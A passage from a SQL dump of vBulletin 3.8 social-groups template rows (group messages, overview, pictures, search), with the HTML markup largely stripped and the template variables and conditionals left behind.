    \r\n \".(($show[\'group\']) ? (\"\r\n \" . construct_phrase(\"$vbphrase[group_x]\", \"group.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"gmid=$message[gmid]#gmessage$message[gmid]\", \"$message[groupname]\") . \"\r\n \") : (\"\")).\"\r\n \".(($show[\'discussion\']) ? (\"\r\n \" . construct_phrase(\"$vbphrase[discussion_x]\", \"group.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"gmid=$message[gmid]#gmessage$message[gmid]\", \"$message[discussiontitle]\") . \"\r\n \") : (\"\")).\"\r\n
    \r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n\r\n
    \r\n \".(($show[\'moderation\']) ? (\"
    $vbphrase[this_message_is_moderated]
    \") : (\"\")).\"\r\n
    $message[message]
    \r\n\r\n \r\n
    \r\n \".(($message[\'avatarurl\']) ? (\"\r\n
    \r\n \") : (\"\")).\"\r\n
    \r\n \".(($show[\'edit\'] AND $show[\'popups\'] AND !$message[is_discussion]) ? (\"\r\n \r\n \") : (\"\")).\"\r\n
    \r\n
    ', '
    \r\n \r\n \r\n \r\n
    \r\n
    \r\n \r\n \r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n
    $message[date] $message[time]
    \r\n \r\n $message[musername]\r\n \r\n $message[musername]\r\n \r\n \r\n \r\n
    \r\n \r\n $vbphrase[group_x]\r\n \r\n \r\n $vbphrase[discussion_x]\r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    $vbphrase[this_message_is_moderated]
    \r\n
    $message[message]
    \r\n\r\n \r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n \r\n \r\n \r\n
    \r\n
    ', 'template', 1229341458, 'vBulletin Solutions', '3.8.0 Release Candidate 2', 'vbulletin'), (1596, -1, 'socialgroups_message_deleted', '
    \r\n
    \r\n
    \r\n
    \r\n \".(($show[\'inlinemod\']) ? (\"\") : (\"\")).\"\r\n
    $message[date]\".((!$show[\'detailedtime\']) ? (\" $message[time]\") : (\"\")).\"
    \r\n \".(($message[\'postuserid\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"u=$message[postuserid]\\\" class=\\\"smallfont username\\\">$message[musername]\r\n \") : (\"\r\n $message[musername]\r\n \")).\"\r\n\r\n \".(($show[\'group\'] OR $show[\'discussion\']) ? (\"\r\n
    \r\n \".(($show[\'group\']) ? (\"\r\n \" . construct_phrase(\"$vbphrase[group_x]\", \"group.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"gmid=$message[gmid]#gmessage$message[gmid]\", \"$message[groupname]\") . \"\r\n \") : (\"\")).\"\r\n \".(($show[\'discussion\']) ? (\"\r\n \" . construct_phrase(\"$vbphrase[discussion_x]\", \"group.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"gmid=$message[gmid]#gmessage$message[gmid]\", \"$message[discussiontitle]\") . \"\r\n \") : (\"\")).\"\r\n
    \r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n\r\n
    \r\n \".(($show[\'deleted\']) ? (\"\r\n $message[message]
    \r\n \") : (\"\")).\"\r\n
    \r\n \" . construct_phrase(\"$vbphrase[message_deleted_by_x]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$message[del_userid]\", \"$message[del_username]\") . \"\r\n \".(($message[\'del_reason\']) ? (\"$vbphrase[reason] $message[del_reason]\") : (\"\")).\"\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n
    ', '
    \r\n
    \r\n
    \r\n
    \r\n \r\n
    $message[date] $message[time]
    \r\n \r\n $message[musername]\r\n \r\n $message[musername]\r\n \r\n\r\n \r\n
    \r\n \r\n $vbphrase[group_x]\r\n \r\n \r\n $vbphrase[discussion_x]\r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \r\n $message[message]
    \r\n
    \r\n
    \r\n $vbphrase[message_deleted_by_x]\r\n $vbphrase[reason] $message[del_reason]\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n
    ', 'template', 1219079849, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'); INSERT INTO `template` (`templateid`, `styleid`, `title`, `template`, `template_un`, `templatetype`, `dateline`, `username`, `version`, `product`) VALUES (1597, -1, 'socialgroups_message_ignored', '
    \r\n
    \r\n
    \r\n
    \r\n \".(($show[\'inlinemod\']) ? (\"\") : (\"\")).\"\r\n
    $message[date]\".((!$show[\'detailedtime\']) ? (\" $message[time]\") : (\"\")).\"
    \r\n session->vars[\'sessionurl\'] . \"u=$message[postuserid]\\\" class=\\\"username\\\">$message[musername]\r\n\r\n \".(($show[\'group\'] OR $show[\'discussion\']) ? (\"\r\n
    \r\n \".(($show[\'group\']) ? (\"\r\n \" . construct_phrase(\"$vbphrase[group_x]\", \"group.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"gmid=$message[gmid]#gmessage$message[gmid]\", \"$message[groupname]\") . \"\r\n \") : (\"\")).\"\r\n \".(($show[\'discussion\']) ? (\"\r\n \" . construct_phrase(\"$vbphrase[discussion_x]\", \"group.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"gmid=$message[gmid]#gmessage$message[gmid]\", \"$message[discussiontitle]\") . \"\r\n \") : (\"\")).\"\r\n
    \r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n \r\n
    \r\n \".(($show[\'moderation\']) ? (\"
    $vbphrase[this_message_is_moderated]
    \") : (\"\")).\"\r\n \" . construct_phrase(\"$vbphrase[message_hidden_x_on_ignore_list]\", \"$message[username]\", \"profile.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"do=ignorelist\") . \"\r\n \r\n \r\n
    \r\n
    \r\n
    ', '
    \r\n
    \r\n
    \r\n
    \r\n \r\n
    $message[date] $message[time]
    \r\n $message[musername]\r\n\r\n \r\n
    \r\n \r\n $vbphrase[group_x]\r\n \r\n \r\n $vbphrase[discussion_x]\r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n \r\n
    \r\n
    $vbphrase[this_message_is_moderated]
    \r\n $vbphrase[message_hidden_x_on_ignore_list]\r\n \r\n \r\n
    \r\n
    \r\n
    ', 'template', 1219079869, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1598, -1, 'socialgroups_mygroups_bit', '', '
    \r\n \r\n \"$mygroup[shortdescription]\"\r\n unread\">$mygroup[name]\r\n \r\n $template_hook[group_after_mygroups_bit]\r\n
    ', 'template', 1218628617, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1599, -1, 'socialgroups_mygroups_listview_bit', '\r\n \r\n session->vars[\'sessionurl\'] . \"do=grouplist&cat=$mygroup[categoryid]\\\" style=\\\"font-weight:normal\\\">$mygroup[categoryname]\r\n \r\n \r\n \r\n $mygroup[joindate]\r\n \r\n \".(($mygroup[\'group_options\']) ? (\"\r\n \".(($mygroup[\'edit_group\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($mygroup[\'delete_group\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($mygroup[\'leave_group\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"do=leave&groupid=$mygroup[groupid]\\\">$vbphrase[leave_social_group]\r\n \") : (\"\")).\"\r\n \") : (\"\r\n $vbphrase[n_a]\r\n \")).\"\r\n \r\n', '\r\n \r\n $mygroup[categoryname]\r\n
    \r\n class=\"unread\">$mygroup[name]\r\n
    $mygroup[shortdescription]
    \r\n
    \r\n \r\n \r\n $mygroup[joindate]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[leave_social_group]\r\n \r\n \r\n $vbphrase[n_a]\r\n \r\n \r\n', 'template', 1232023585, 'vBulletin Solutions', '3.8.1', 'vbulletin'), (1600, -1, 'socialgroups_newgroup_bit', '', '
    \r\n \r\n \"$group[shortdescription]\"\r\n unread\">$group[name]\r\n \r\n $template_hook[group_after_newgroup_bit]\r\n
    ', 'template', 1218628472, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1601, -1, 'socialgroups_newgroup_listview_bit', '\r\n \r\n \r\n \r\n session->vars[\'sessionurl\'] . \"do=grouplist&cat=$group[categoryid]\\\" style=\\\"font-weight:normal\\\">$group[categoryname]\r\n', '\r\n \r\n
    \r\n $group[name]\r\n
    $group[shortdescription]
    \r\n
    \r\n \r\n $group[categoryname]\r\n', 'template', 1232023618, 'vBulletin Solutions', '3.8.1', 'vbulletin'), (1602, -1, 'socialgroups_overview', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $custompagetitle\r\n$socialgroups_css\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$template_hook[group_overview_start]\r\n\r\n
    \r\n
    \r\n\r\n $template_hook[group_overview_before_categories]\r\n\r\n \".(($categorybits) ? (\"\r\n
    \r\n
    session->vars[\'sessionurl\'] . \"do=grouplist\\\" method=\\\"post\\\">\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    $vbphrase[search_groups]  
    \r\n $vbphrase[categories]\r\n
    \r\n $categorybits\r\n
    \r\n session->vars[\'sessionurl\'] . \"do=categorylist\\\">$vbphrase[view_all_categories]\r\n
    \r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n $template_hook[group_overview_after_categories]\r\n\r\n \".(($randomgroup) ? (\"\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n $vbphrase[random_group]\r\n
    \r\n \" . construct_phrase(\"$vbphrase[in_category_x]\", \"session->vars[\'sessionurl\'] . \"do=grouplist&cat=$randomgroup[categoryid]\\\" style=\\\"font-weight:normal\\\">$randomgroup[categoryname]\") . \"\r\n session->vars[\'sessionurl\'] . \"groupid=$randomgroup[groupid]\\\" \".((!$randomgroup[is_read]) ? (\"class=\\\"unread\\\"\") : (\"\")).\">$randomgroup[name]
    \r\n
    \r\n \".(($show[\'sgicons\']) ? (\"\") : (\"\")).\"\r\n $randomgroup[mediumdescription]\r\n
    \r\n \r\n \r\n \r\n \".(($show[\'messageinfo\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n
    \r\n \r\n \".(($show[\'pictureinfo\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n \r\n \r\n
    \r\n
    \r\n $template_hook[group_random_group_info]\r\n
    \r\n session->vars[\'sessionurl\'] . \"do=grouplist\\\">$vbphrase[view_all_groups]\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n $template_hook[group_overview_after_random_group]\r\n\r\n \".(($owngroup) ? (\"\r\n
    \r\n $owngroup\r\n
    \r\n \") : (\"\")).\"\r\n\r\n $template_hook[group_overview_after_own_groups]\r\n\r\n\r\n
    \r\n \r\n \r\n \r\n \r\n\r\n \".(($show[\'sgicons\']) ? (\"\r\n\r\n \r\n \".(($mygroup_bits) ? (\"\r\n \r\n \") : (\"\r\n \r\n \")).\"\r\n \r\n\r\n \") : (\"\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n $mygroup_bits\r\n\r\n \")).\"\r\n\r\n
    $vbphrase[your_groups]
    \r\n $mygroup_bits\r\n \r\n $vbphrase[you_are_not_a_member_of_any_groups]\r\n
    $vbphrase[group_name]$vbphrase[joined_group]$vbphrase[options]
    \r\n
    \r\n\r\n
    \r\n\r\n $template_hook[group_overview_after_your_groups]\r\n\r\n
    \r\n \r\n \r\n \r\n \r\n\r\n \".(($show[\'sgicons\']) ? (\"\r\n\r\n \r\n \".(($newgroupbits) ? (\"\r\n \r\n \") : (\"\r\n \r\n \")).\"\r\n \r\n\r\n \") : (\"\r\n\r\n \r\n \r\n \r\n \r\n\r\n $newgroupbits\r\n\r\n \")).\"\r\n\r\n \".(($newgroupbits) ? (\"\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n
    \r\n $vbphrase[new_groups]\r\n
    \r\n $newgroupbits\r\n \r\n $vbphrase[no_social_groups]
    \r\n \".(($show[\'creategroup\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"do=create\\\" rel=\\\"nofollow\\\">$vbphrase[create_a_new_group]\r\n \") : (\"\")).\"\r\n
    $vbphrase[group_name]$vbphrase[category]
    \r\n session->vars[\'sessionurl\'] . \"do=grouplist\\\">$vbphrase[view_all_groups]\r\n
    \r\n
    \r\n\r\n $template_hook[group_overview_after_new_groups]\r\n\r\n \".(($show[\'creategroup\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n\r\n \r\n\r\n \r\n\r\n $template_hook[group_overview_after_action_links]\r\n
    \r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $custompagetitle\r\n$socialgroups_css\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$template_hook[group_overview_start]\r\n\r\n
    \r\n
    \r\n\r\n $template_hook[group_overview_before_categories]\r\n\r\n \r\n
    \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    $vbphrase[search_groups]  
    \r\n $vbphrase[categories]\r\n
    \r\n $categorybits\r\n
    \r\n $vbphrase[view_all_categories]\r\n
    \r\n\r\n \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n\r\n $template_hook[group_overview_after_categories]\r\n\r\n \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n $vbphrase[random_group]\r\n
    \r\n $randomgroup[categoryname]\'>$vbphrase[in_category_x]\r\n class=\"unread\">$randomgroup[name]
    \r\n
    \r\n
    \"$randomgroup[shortdescription]\"
    \r\n $randomgroup[mediumdescription]\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    $vbphrase[group_members]: $randomgroup[members]
    \r\n \r\n
    $vbphrase[pictures]: $randomgroup[picturecount]
    \r\n
    \r\n
    \r\n
    $vbphrase[discussions]: $randomgroup[discussions]
    \r\n
    $vbphrase[messages]: $randomgroup[visible]
    \r\n
    \r\n
    \r\n $template_hook[group_random_group_info]\r\n
    \r\n $vbphrase[view_all_groups]\r\n
    \r\n
    \r\n
    \r\n\r\n $template_hook[group_overview_after_random_group]\r\n\r\n \r\n
    \r\n $owngroup\r\n
    \r\n
    \r\n\r\n $template_hook[group_overview_after_own_groups]\r\n\r\n\r\n
    \r\n \r\n \r\n \r\n \r\n\r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n $mygroup_bits\r\n\r\n \r\n\r\n
    $vbphrase[your_groups]
    \r\n $mygroup_bits\r\n \r\n $vbphrase[you_are_not_a_member_of_any_groups]\r\n
    $vbphrase[group_name]$vbphrase[joined_group]$vbphrase[options]
    \r\n
    \r\n\r\n
    \r\n\r\n $template_hook[group_overview_after_your_groups]\r\n\r\n
    \r\n \r\n \r\n \r\n \r\n\r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n\r\n \r\n \r\n \r\n \r\n\r\n $newgroupbits\r\n\r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n
    \r\n $vbphrase[new_groups]\r\n
    \r\n $newgroupbits\r\n \r\n $vbphrase[no_social_groups]
    \r\n \r\n $vbphrase[create_a_new_group]\r\n \r\n
    $vbphrase[group_name]$vbphrase[category]
    \r\n $vbphrase[view_all_groups]\r\n
    \r\n
    \r\n\r\n $template_hook[group_overview_after_new_groups]\r\n\r\n \r\n \r\n \r\n\r\n \r\n\r\n \r\n\r\n $template_hook[group_overview_after_action_links]\r\n
    \r\n\r\n$footer\r\n\r\n', 'template', 1235391552, 'vBulletin Solutions', '3.8.2', 'vbulletin'), (1603, -1, 'socialgroups_owngroup_bit', '\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[groups_you_created]\r\n
    \r\n $vbphrase[last_updated]: $owngroup[lastupdatedate] $owngroup[lastupdatetime]\r\n session->vars[\'sessionurl\'] . \"groupid=$owngroup[groupid]\\\" \".((!$owngroup[is_read]) ? (\"class=\\\"unread\\\"\") : (\"\")).\">$owngroup[name]\r\n \r\n
    \r\n
    \r\n \".(($show[\'sgicons\']) ? (\"\") : (\"\")).\"\r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n \".(($show[\'pictureinfo\'] AND $show[\'messageinfo\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n \r\n \".(($show[\'pictureinfo\'] AND !$show[\'messageinfo\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'messageinfo\']) ? (\"\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n $template_hook[group_own_group_info]\r\n
    \r\n \".(($owngroup[shownext] OR $owngroup[showprevious]) ? (\"\r\n \r\n \".(($owngroup[shownext]) ? (\"\r\n   session->vars[\'sessionurl\'] . \"owngrouppage=$owngroup[next]\\\" onclick=\\\"return load_html(\'sg_owngroups\', \'group.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"do=owngroup&owngrouppage=$owngroup[next]\', \'\', \'owngroup_progress\')\\\">$vbphrase[view_next]\r\n \") : (\"\r\n   $vbphrase[view_next]\r\n \")).\"\r\n \r\n \r\n \".(($owngroup[showprevious]) ? (\"\r\n session->vars[\'sessionurl\'] . \"owngrouppage=$owngroup[previous]\\\" onclick=\\\"return load_html(\'sg_owngroups\', \'group.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"do=owngroup&owngrouppage=$owngroup[previous]\', \'\', \'owngroup_progress\')\\\">$vbphrase[view_previous]\r\n \") : (\"\r\n $vbphrase[view_previous]\r\n \")).\"\r\n \r\n \") : (\"\")).\"\r\n session->vars[\'sessionurl\'] . \"do=edit&groupid=$owngroup[groupid]\\\">$vbphrase[edit_group]  \r\n session->vars[\'sessionurl\'] . \"do=delete&groupid=$owngroup[groupid]\\\">$vbphrase[delete_group]\r\n
    ', '\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[groups_you_created]\r\n
    \r\n unread\" style=\"float:$stylevar[right]\">$vbphrase[last_updated]: $owngroup[lastupdatedate] $owngroup[lastupdatetime]\r\n class=\"unread\">$owngroup[name]\r\n \r\n
    \r\n
    \r\n
    \"$owngroup[shortdescription]\"
    \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    $vbphrase[group_members]: $owngroup[members]
    \r\n \r\n
    $vbphrase[pictures]: $owngroup[picturecount]
    \r\n
    \r\n
    $vbphrase[pending_members]: $owngroup[moderatedmembers]
    \r\n
    \r\n \r\n
    $vbphrase[pictures]: $owngroup[picturecount]
    \r\n
    \r\n \r\n
    $vbphrase[discussions]: $owngroup[discussions]
    \r\n
    $vbphrase[messages]: $owngroup[visible]
    \r\n
    $vbphrase[moderation]: $owngroup[moderation]
    \r\n
    \r\n
    \r\n
    \r\n $template_hook[group_own_group_info]\r\n
    \r\n \r\n \r\n \r\n   $vbphrase[view_next]\r\n \r\n   $vbphrase[view_next]\r\n \r\n \r\n \r\n \r\n $vbphrase[view_previous]\r\n \r\n $vbphrase[view_previous]\r\n \r\n \r\n \r\n $vbphrase[edit_group]  \r\n $vbphrase[delete_group]\r\n
    ', 'template', 1235391594, 'vBulletin Solutions', '3.8.2', 'vbulletin'), (1604, -1, 'socialgroups_picture', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n $picturecomment_css\r\n \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $custompagetitle\r\n\r\n\r\n\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n \".(($show[\'picture_nav\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n\r\n \" . construct_phrase(\"$vbphrase[picture_x_of_y_from_group_z]\", \"$pic_location[pic_position]\", \"$group[picturecount]\", \"$group[name]\") . \"\r\n
    \r\n \r\n \r\n \r\n \r\n \".(($pictureinfo[\'caption_html\']) ? (\"\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n \r\n \r\n \r\n
    session->vars[\'sessionurl\'] . \"groupid=$group[groupid]&pictureid=$pictureinfo[pictureid]\\\" alt=\\\"$vbphrase[picture]\\\" />
    $pictureinfo[caption_html]
    \r\n \".(($show[\'edit_picture_option\'] OR $show[\'reportlink\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n
    $vbphrase[picture_added]: $pictureinfo[adddate] \".((!$show[\'detailedtime\']) ? (\"$pictureinfo[addtime]\") : (\"\")).\"
    \r\n \r\n
    \r\n
    \r\n\r\n\".(($show[\'picture_nav\']) ? (\"\r\n \r\n\") : (\"\")).\"\r\n\r\n$picturecomment_commentarea\r\n\r\n\".(($show[\'picturecomment_options\'] AND $show[\'picture_nav\']) ? (\"\r\n \r\n\") : (\"\")).\"\r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n $picturecomment_css\r\n $vboptions[bbtitle] - $custompagetitle\r\n\r\n\r\n\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n \r\n \r\n \r\n\r\n $vbphrase[picture_x_of_y_from_group_z]\r\n
    \r\n 450$pictureinfo[width]\" cellpadding=\"$stylevar[cellpadding]\">\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \"$vbphrase[picture]\"
    $pictureinfo[caption_html]
    \r\n \r\n \r\n \r\n
    $vbphrase[picture_added]: $pictureinfo[adddate] $pictureinfo[addtime]
    \r\n
    $vbphrase[picture_by]: $pictureinfo[username]
    \r\n
    \r\n
    \r\n\r\n\r\n \r\n\r\n\r\n$picturecomment_commentarea\r\n\r\n\r\n \r\n\r\n\r\n$footer\r\n\r\n', 'template', 1214218742, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1605, -1, 'socialgroups_picturebit', '\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n \".(($picture[\'thumburl\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"do=picture&groupid=$group[groupid]&pictureid=$picture[pictureid]\\\">\\\"$picture[caption_preview]\\\"\r\n \") : (\"\r\n session->vars[\'sessionurl\'] . \"do=picture&groupid=$group[groupid]&pictureid=$picture[pictureid]\\\">\".(($picture[\'caption_preview\']) ? (\"$picture[caption_preview]\") : (\"$vbphrase[picture]\")).\"\r\n \")).\"\r\n
    \r\n \".(($picture[\'username\']) ? (\"\r\n \" . construct_phrase(\"$vbphrase[from_x]\", \"\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"\", \"$picture[userid]\", \"$picture[username]\") . \"\r\n \") : (\"\r\n  \r\n \")).\"\r\n
    ', '\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n \r\n \"$picture[caption_preview]\"border:solid $stylevar[cellspacing]px $stylevar[tborder_bgcolor];\r\n \" $picture[dimensions] />\r\n \r\n $picture[caption_preview]$vbphrase[picture]\r\n \r\n
    \r\n \r\n $vbphrase[from_x]\r\n \r\n  \r\n \r\n
    ', 'template', 1213886222, 'vBulletin Solutions', '3.7.1', 'vbulletin'), (1606, -1, 'socialgroups_pictures', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $custompagetitle\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\".(($pagenav) ? (\"
    $pagenav
    \") : (\"\")).\"\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n \".(($show[\'add_pictures_link\']) ? (\"session->vars[\'sessionurl\'] . \"do=addpictures&groupid=$group[groupid]\\\">$vbphrase[add_pictures]\") : (\"\")).\"\r\n \" . construct_phrase(\"$vbphrase[pictures_from_group_x]\", \"$group[name]\") . \"\r\n
    \r\n \".(($picturebits) ? (\"\r\n $picturebits\r\n \") : (\"\r\n $vbphrase[no_pictures_added_group_yet]\r\n \".(($show[\'add_pictures_link\']) ? (\"session->vars[\'sessionurl\'] . \"do=addpictures&groupid=$group[groupid]\\\">$vbphrase[add_pictures_to_this_group]\") : (\"\")).\"\r\n \")).\"\r\n
    \r\n\r\n\".(($pagenav) ? (\"
    $pagenav
    \") : (\"\")).\"\r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n $vboptions[bbtitle] - $custompagetitle\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n
    $pagenav
    \r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[add_pictures]\r\n $vbphrase[pictures_from_group_x]\r\n
    \r\n \r\n $picturebits\r\n \r\n $vbphrase[no_pictures_added_group_yet]\r\n $vbphrase[add_pictures_to_this_group]\r\n \r\n
    \r\n\r\n
    $pagenav
    \r\n\r\n$footer\r\n\r\n', 'template', 1196261152, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1607, -1, 'socialgroups_search', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $pagetitle\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\".(($show[\'errors\']) ? (\"\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n \".((!$grouplisttitle) ? (\"$vbphrase[errors_occured_with_search]\r\n \") : (\"$grouplisttitle\")).\"\r\n
    \r\n \".(($show[\'noresults\']) ? (\"\r\n
      $errorlist
    \r\n \") : (\"\r\n
      $errorlist
    \r\n \")).\"\r\n
    \r\n

    \r\n\") : (\"\")).\"\r\n\r\n
    session->vars[\'sessionurl\'] . \"do=grouplist\\\" method=\\\"post\\\">\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[advanced_search]
    \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n $vbphrase[search_by_key_word]\r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n $vbphrase[find_groups_with]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n \r\n \r\n
    \r\n \r\n \r\n \r\n
    \r\n \r\n \r\n \r\n
    \r\n \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n $vbphrase[creation_date_filter]\r\n
    \r\n
    $vbphrase[date_is_before]
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    $vbphrase[date_is_after]
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[category_filter]\r\n
    \r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \r\n
    \r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n
    \r\n\r\n$footer\r\n\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n $vboptions[bbtitle] - $pagetitle\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[errors_occured_with_search]\r\n $grouplisttitle\r\n
    \r\n \r\n
      $errorlist
    \r\n \r\n
      $errorlist
    \r\n
    \r\n
    \r\n

    \r\n
    \r\n\r\n
    \r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[advanced_search]
    \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n $vbphrase[search_by_key_word]\r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n $vbphrase[find_groups_with]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n \r\n \r\n
    \r\n \r\n \r\n \r\n
    \r\n \r\n \r\n \r\n
    \r\n \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n $vbphrase[creation_date_filter]\r\n
    \r\n
    $vbphrase[date_is_before]
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    $vbphrase[date_is_after]
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[category_filter]\r\n
    \r\n
